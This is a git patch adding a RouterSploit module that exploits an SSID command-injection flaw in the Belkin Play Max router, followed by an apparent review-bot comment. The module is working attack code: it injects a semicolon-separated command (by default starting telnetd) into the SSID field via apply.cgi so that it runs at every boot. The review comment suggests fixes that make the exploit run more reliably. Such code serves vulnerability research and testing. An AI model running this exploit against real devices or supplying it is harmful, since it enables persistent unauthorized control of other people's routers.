From b9c3b2363da817ad120fd40c7f4e0d5f65f51f64 Mon Sep 17 00:00:00 2001 From: BigNerd95 Date: Mon, 20 Feb 2017 19:48:10 +0100 Subject: [PATCH] Added Belkin Exploit Persistent Remote Command Execution on Belkin Play Max (0day) --- .gitignore | 4 + .../modules/exploits/belkin/play_max_prce.py | 75 +++++++++++++++++++ 2 files changed, 79 insertions(+) create mode 100644 routersploit/modules/exploits/belkin/play_max_prce.py diff --git a/.gitignore b/.gitignore index 0b5079e04..358d51529 100644 --- a/.gitignore +++ b/.gitignore @@ -67,3 +67,7 @@ target/ # virtualenv venv/ + +# macOS +.DS_Store +.DS_Store? diff --git a/routersploit/modules/exploits/belkin/play_max_prce.py b/routersploit/modules/exploits/belkin/play_max_prce.py new file mode 100644 index 000000000..5b959aaf6 --- /dev/null +++ b/routersploit/modules/exploits/belkin/play_max_prce.py 
@@ -0,0 +1,75 @@ +import re + +from routersploit import ( + exploits, + print_error, + print_success, + http_request, + mute, + validators, +) + + +class Exploit(exploits.Exploit): + """ + Persistent remote command execution. + If the target is vulnerable, you can run a bash command at every boot. + You must be logged in to run this exploit, you can use auth_bypass exploit to log in. + """ + __info__ = { + 'name': 'Belkin Persistent Remote Command Execution', + 'description': 'Module exploits Belkin SSID injection vuln, allowing to execute arbitrary command at every boot', + 'authors': [ + 'BigNerd95 (Lorenzo Santina)', # vulnerability discovery and routersploit module + ], + 'references': [ + 'https://bignerd95.blogspot.it/2017/02/belkin-play-max-persistent-remote.html', + 'https://gist.github.com/BigNerd95/c18658b472ac0ccf4dbbc73fe988b683' + ], + 'devices': [ + 'Belkin Play Max (F7D4401)', + ], + } + + target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) + port = exploits.Option(80, 'Target Port') + cmd = exploits.Option('telnetd', 'Command to execute') + + def run(self): + + ssid_url = "{}:{}/wireless_id.stm".format(self.target, self.port) + response = http_request(method="GET", url=ssid_url) + if response is None: + return + + srcSSID = re.search("document\.tF\['ssid'\]\.value=\"(.*)\";", response.text) + if srcSSID: + SSID = srcSSID.group(1) + else: + print_error("Exploit failed. 
Are you logged in?") + exit(1) + + if len(SSID)+2+len(self.cmd) > 32: + newlen = 32 - len(self.cmd) - 2 + SSID = SSID[0:newlen] + print_status("SSID too long, it will be truncated to: "+SSID) + + newSSID = SSID+"%3B"+self.cmd+"%3B" + + payload = "page=radio.asp&location_page=wireless_id.stm&wl_bssid=&wl_unit=0&wl_action=1&wl_ssid="+newSSID+"&arc_action=Apply+Changes&wchan=1&ssid="+newSSID + url = "{}:{}/apply.cgi".format(self.target, self.port) + response = http_request(method="POST", url=url, data=payload) + + if response is None: + return + + err = re.search('countdown\(55\);', response.text) + if err: + print_success("Exploit success, wait until router reboot.") + else: + print_error("Exploit failed. Device seems to be not vulnerable.") + exit(1) + + @mute + def check(self): + return None
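Review bot: `print_status` is called in the SSID-truncation branch of `run` (`print_status("SSID too long, it will be truncated to: "+SSID)`) but is not in the `from routersploit import (...)` list at the top of the hunk, so that branch raises `NameError` instead of printing; add `print_status,` to the import. The two `exit(1)` calls after `print_error` terminate the whole interpreter rather than handing control back to the framework console, while the earlier `if response is None: return` already shows the intended idiom, so both should become `return`. The patterns `"document\.tF\['ssid'\]\.value=\"(.*)\";"` and `'countdown\(55\);'` are non-raw strings whose `\.`, `\[` and `\(` are invalid escape sequences that newer Python versions warn about; prefix both with `r`. Naming-wise, `srcSSID`/`SSID`/`newSSID` would read as `ssid_match`/`ssid`/`new_ssid` under PEP 8.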